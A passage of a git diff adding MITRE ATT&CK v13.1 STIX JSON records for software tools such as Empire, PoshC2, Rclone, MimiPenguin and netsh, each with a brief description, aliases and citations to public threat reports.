"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + } + ], + "modified": "2021-03-29T19:54:46.007Z", + "name": "spwebmember", + "description": "[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3.json new file mode 100644 index 0000000000000000000000000000000000000000..c52558e498b68bdd73c2ccef9d20130ccda12787 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--6d7998e9-70e9-4fcb-ac7b-18a0e570bec5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:43:09.336Z", + "name": "Empire", + "description": "[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.6", + "x_mitre_aliases": [ + "Empire", + "EmPyre", + "PowerShell Empire" + ], + "type": "tool", + "id": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "created": "2019-03-11T14:13:40.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0363", + "external_id": "S0363" + }, + { + "source_name": "EmPyre", + "description": "(Citation: Github PowerShell Empire)" + }, + { + "source_name": "PowerShell Empire", + "description": "(Citation: Github PowerShell Empire)" + }, + { + "source_name": "Github PowerShell Empire", + "description": "Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.", + "url": "https://github.com/PowerShellEmpire/Empire" + }, + { + "source_name": "GitHub ATTACK Empire", + "description": "Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.", + "url": "https://github.com/dstepanic/attck_empire" + }, + { + "source_name": "NCSC Joint Report Public Tools", + "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.", + "url": "https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5.json new file mode 100644 index 0000000000000000000000000000000000000000..bb4ea173497559272cd1c756ad477611c76f935f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--35e8b690-70f6-403f-9d0c-482c14761f97", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5", + "type": "tool", + "created": "2017-05-31T21:33:03.377Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0101", + "external_id": "S0101" + }, + { + "source_name": "Wikipedia Ifconfig", + "description": "Wikipedia. (2016, January 26). ifconfig. Retrieved April 17, 2016.", + "url": "https://en.wikipedia.org/wiki/Ifconfig" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "ifconfig", + "description": "[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe.json new file mode 100644 index 0000000000000000000000000000000000000000..2431ef0a2ef83f0db21428dcf3f862f7353a5d14 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--c73326fc-1ff9-44ca-8ded-88cd828559dc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-04T18:56:27.812Z", + "name": "dsquery", + "description": "[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_aliases": [ + "dsquery", + "dsquery.exe" + ], + "type": "tool", + "id": "tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe", + "created": "2017-05-31T21:33:04.937Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0105", + "external_id": "S0105" + }, + { + "source_name": "TechNet Dsquery", + "description": "Microsoft. (n.d.). Dsquery. Retrieved April 18, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc732952.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3a53b207-aba2-4a2b-9cdb-273d633669e7.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3a53b207-aba2-4a2b-9cdb-273d633669e7.json new file mode 100644 index 0000000000000000000000000000000000000000..d4a13bde52a99f37fd3de5e0c81f329f861a639e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3a53b207-aba2-4a2b-9cdb-273d633669e7.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--8fbee6c6-c7be-44ed-89cf-77c60b1b6f90", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T14:12:41.582Z", + "name": "PcShare", + "description": "[PcShare](https://attack.mitre.org/software/S1050) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: GitHub PcShare 2014)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "PcShare" + ], + "type": "tool", + "id": "tool--3a53b207-aba2-4a2b-9cdb-273d633669e7", + "created": "2022-10-13T14:07:52.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1050", + "external_id": "S1050" + }, + { + "source_name": "GitHub PcShare 2014", + "description": "LiveMirror. (2014, September 17). PcShare. Retrieved October 11, 2022.", + "url": "https://github.com/LiveMirror/pcshare" + }, + { + "source_name": "Bitdefender FunnyDream Campaign November 2020", + "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079.json new file mode 100644 index 0000000000000000000000000000000000000000..5b4230beece10bc49ecb627d1c6175ad9c0e5e66 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--ec49eb56-489b-4df0-847a-a6bb9d795ddd", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "RawDisk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", + "created": "2019-03-25T12:30:40.919Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0364", + "url": "https://attack.mitre.org/software/S0364" + }, + { + "source_name": "EldoS RawDisk ITpro", + "url": "https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp", + "description": "Edwards, M. (2007, March 14). EldoS Provides Raw Disk Access for Vista and XP. Retrieved March 26, 2019." + }, + { + "source_name": "Novetta Blockbuster Destructive Malware", + "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)", + "modified": "2022-07-28T18:55:35.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "RawDisk", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4664b683-f578-434f-919b-1c1aad2a1111.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4664b683-f578-434f-919b-1c1aad2a1111.json new file mode 100644 index 0000000000000000000000000000000000000000..282ba186431bcbbb5d0f7ea76735f86907876e35 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4664b683-f578-434f-919b-1c1aad2a1111.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--cc5328f2-0a69-4299-9f15-b670888189dc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T21:29:16.407Z", + "name": "netstat", + "description": "[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "netstat" + ], + "type": "tool", + "id": "tool--4664b683-f578-434f-919b-1c1aad2a1111", + "created": "2017-05-31T21:33:04.545Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0104", + "external_id": "S0104" + }, + { + "source_name": "TechNet Netstat", + "description": "Microsoft. (n.d.). Netstat. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490947.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4b57c098-f043-4da2-83ef-7588a6d426bc.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4b57c098-f043-4da2-83ef-7588a6d426bc.json new file mode 100644 index 0000000000000000000000000000000000000000..701d1cacf9afac0e0d5a065fa4181782a9a8a133 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4b57c098-f043-4da2-83ef-7588a6d426bc.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--01108eb1-ac00-4f55-b94a-f0c876521716", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "PoshC2" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--4b57c098-f043-4da2-83ef-7588a6d426bc", + "created": "2019-04-23T12:31:58.125Z", + "x_mitre_version": "1.3", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0378", + "url": "https://attack.mitre.org/software/S0378" + }, + { + "source_name": "GitHub PoshC2", + "url": "https://github.com/nettitude/PoshC2_Python", + "description": "Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)", + "modified": "2022-06-03T17:45:36.186Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PoshC2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe.json new file mode 100644 index 0000000000000000000000000000000000000000..6042451afca46e5563bcac4ba797e8283c6c5398 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--0b701fb9-13e0-4b99-9743-91024b61a17a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Fgdump" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe", + "type": "tool", + "created": "2017-05-31T21:33:10.569Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0120", + "external_id": "S0120" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "modified": "2020-03-30T16:40:33.738Z", + "name": "Fgdump", + "description": "[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b.json new file mode 100644 index 0000000000000000000000000000000000000000..9ed4c089f9c3a4bf2e4f4b2a15491a039e378509 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--a4c7b502-291a-431d-b0bb-e33f7da84475", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", + "type": "tool", + "created": "2017-05-31T21:33:11.941Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0123", + "external_id": "S0123" + }, + { + "source_name": "xCmd", + "description": "Rayaprolu, A.. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.", + "url": "https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "xCmd", + "description": "[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5256c0f8-9108-4c92-8b09-482dfacdcd94.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5256c0f8-9108-4c92-8b09-482dfacdcd94.json new file mode 100644 index 0000000000000000000000000000000000000000..2e5006abdad168c995ab2dac16cd5f1aed75d60c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5256c0f8-9108-4c92-8b09-482dfacdcd94.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--d47a9069-154d-43a3-941c-c9225a8f1954", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-18T23:14:56.867Z", + "name": "CSPY Downloader", + "description": "[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "CSPY Downloader" + ], + "type": "tool", + "id": "tool--5256c0f8-9108-4c92-8b09-482dfacdcd94", + "created": "2020-11-09T14:30:35.202Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0527", + "external_id": "S0527" + }, + { + "source_name": "Cybereason Kimsuky November 2020", + "description": "Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.", + "url": "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--59096109-a1dd-463b-87e7-a8d110fe3a79.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--59096109-a1dd-463b-87e7-a8d110fe3a79.json new file mode 100644 index 0000000000000000000000000000000000000000..2d89fd7d18065820d246daaccdd4bc6ecc24192a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--59096109-a1dd-463b-87e7-a8d110fe3a79.json @@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--35151991-e7f7-439b-a336-8a3dd7b9b7c6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T13:14:41.257Z", + "name": "Rclone", + "description": "[Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Edward Millington", + "Ian McKay" + ], + "x_mitre_aliases": [ + "Rclone" + ], + "type": "tool", + "id": "tool--59096109-a1dd-463b-87e7-a8d110fe3a79", + "created": "2022-08-30T13:02:36.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1040", + "external_id": "S1040" + }, + { + "source_name": "Detecting Rclone", + "description": " Aaron Greetham. (2021, May 27). Detecting Rclone \u2013 An Effective Tool for Exfiltration. Retrieved August 30, 2022.", + "url": "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" + }, + { + "source_name": "DFIR Conti Bazar Nov 2021", + "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.", + "url": "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" + }, + { + "source_name": "Rclone Wars", + "description": "Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.", + "url": "https://redcanary.com/blog/rclone-mega-extortion/" + }, + { + "source_name": "Rclone", + "description": "Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.", + "url": "https://rclone.org" + }, + { + "source_name": "DarkSide Ransomware Gang", + "description": "Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.", + "url": "https://unit42.paloaltonetworks.com/darkside-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a33468d-844d-4b1f-98c9-0e786c556b27.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a33468d-844d-4b1f-98c9-0e786c556b27.json new file mode 100644 index 0000000000000000000000000000000000000000..c95498894c19e20f0167d250a69e63ca7a76bb6f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a33468d-844d-4b1f-98c9-0e786c556b27.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--97d8a61c-73b0-4bfb-9848-7b693637cbdd", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_aliases": [ + "MimiPenguin" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--5a33468d-844d-4b1f-98c9-0e786c556b27", + "type": "tool", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0179", + "external_id": "S0179" + }, + { + "source_name": "MimiPenguin GitHub May 2017", + "description": "Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.", + "url": "https://github.com/huntergregal/mimipenguin" + } + ], + "modified": "2021-10-15T16:57:34.776Z", + "name": "MimiPenguin", + "description": "[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a63f900-5e7e-4928-a746-dd4558e1df71.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a63f900-5e7e-4928-a746-dd4558e1df71.json new file mode 100644 index 0000000000000000000000000000000000000000..91520e5fd4a04497cb3f077bbf14e2e32fb4ac83 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a63f900-5e7e-4928-a746-dd4558e1df71.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--df5ca29b-416f-4157-9b52-1fd973bd1828", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-17T22:14:55.797Z", + "name": "netsh", + "description": "[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "netsh", + "netsh.exe" + ], + "type": "tool", + "id": "tool--5a63f900-5e7e-4928-a746-dd4558e1df71", + "created": "2017-05-31T21:33:06.083Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0108", + "external_id": "S0108" + }, + { + "source_name": "TechNet Netsh", + "description": "Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.", + "url": "https://technet.microsoft.com/library/bb490939.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4.json new file mode 100644 index 